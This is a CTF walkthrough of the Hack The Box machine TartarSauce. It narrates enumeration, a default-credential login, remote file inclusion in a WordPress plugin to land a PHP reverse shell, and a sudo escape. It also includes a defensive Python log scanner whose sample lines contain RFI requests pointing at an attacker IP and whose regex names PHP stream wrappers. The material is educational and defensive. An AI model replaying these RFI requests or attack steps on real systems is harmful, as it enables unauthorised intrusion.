Hackthebox Walkthrough — TartarSauce1 (User Shell)
I have been taking the PWK course and preparing for the OSCP exam recently. I got a lot of inspiration from many Hackthebox machines besides the PWK labs. So I decided to start writing walkthroughs of retired Hackthebox machines (inspired by hackingarticles, infosec, ippsec’s YouTube videos, etc.; thanks for all of these amazing penetration testing materials!)
Target: 10.10.10.88
Local IP: 10.10.14.2
Nmap Enumeration
Nmap reveals that only port 80 is open. Server banner: Apache httpd 2.4.18
We also discover robots.txt.
Let’s try each of these hidden directories.
We see that only /webservices/monstra-3.0.4 works and returns a valid web page.
We always want to fuzz directories on a web server. Let’s use gobuster this time to see if there are any hidden pages.
Immediately we find a WordPress page at /wp.
Let’s check that out.
Unfortunately, there is nothing interesting on that page.
Let’s focus on the Tartarsauce page.
Try logging in with Username: admin, Password: admin (default).
And we successfully logged in! Let’s see where we could upload a reverse shell.
It looks like most items are read-only.
Run wpscan for more enumeration.
Run searchsploit for gwolle and we find a remote file inclusion vulnerability.
Let’s create a PHP reverse shell and start our apache2 server.
We found out that the web server appends wp-load.php to the end of the path we supply,
so let’s rename our file to wp-load.php.
Set up the netcat listener,
and we get a reverse shell back.
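From the defender's side, the inclusion request above leaves a trace in the web server's access log: a query parameter whose value is a remote URL, and because the server appends wp-load.php itself, only the base URL shows up in the request. The following is an added example, not part of the original walkthrough, that flags such requests even when the value is URL-encoded once or twice. The log lines are constructed, and the plugin path and the parameter name `base` are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log format: client, identity, user, [time], "request", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that starts with a URL scheme or a PHP stream wrapper
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?|php|data|expect|phar):', re.I)

# Constructed sample lines; "example-plugin/ajax.php" and "base" are hypothetical
SAMPLE_LOG = [
    '10.10.14.2 - - [01/Jan/2024:10:00:00 +0000] "GET /wp/ HTTP/1.1" 200 512',
    '10.10.14.2 - - [01/Jan/2024:10:00:05 +0000] "GET /wp/?p=1 HTTP/1.1" 200 640',
    '10.10.14.2 - - [01/Jan/2024:10:01:00 +0000] "GET /wp/wp-content/plugins/'
    'example-plugin/ajax.php?base=http://10.10.14.2/ HTTP/1.1" 200 0',
    '10.10.14.2 - - [01/Jan/2024:10:01:30 +0000] "GET /wp/wp-content/plugins/'
    'example-plugin/ajax.php?base=http%3A%2F%2F10.10.14.2%2F HTTP/1.1" 200 0',
    '10.10.14.2 - - [01/Jan/2024:10:02:00 +0000] "GET /wp/wp-content/plugins/'
    'example-plugin/ajax.php?base=http%253A%252F%252F10.10.14.2%252F HTTP/1.1" 200 0',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded values are seen in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_candidates(lines):
    """Return (client_ip, parameter, decoded_value, status) for URL-valued parameters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(raw)  # parse_qsl has already decoded once
            if REMOTE_RE.match(value):
                hits.append((m.group("ip"), name, value, int(m.group("status"))))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_candidates(SAMPLE_LOG):
        print(hit)
```

Hits are candidates for review, not verdicts: legitimate features such as redirects or embeds also pass URLs in parameters, so pair this with an allowlist of expected parameters and with egress filtering on the web server.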
Let’s work on privilege escalation now!
Run linuxprivchecker.py and LinEnum.sh from /tmp.
We find something that looks interesting: it seems we can pwn the sudo privilege.
And there are two users on the machine: onuma and root.
Searching GTFOBins, we find a shell command that can break out of restricted environments by spawning an interactive system shell,
and we are onuma now.
Grab our user.txt flag!
But we still need to work on getting root privileges.
To be continued …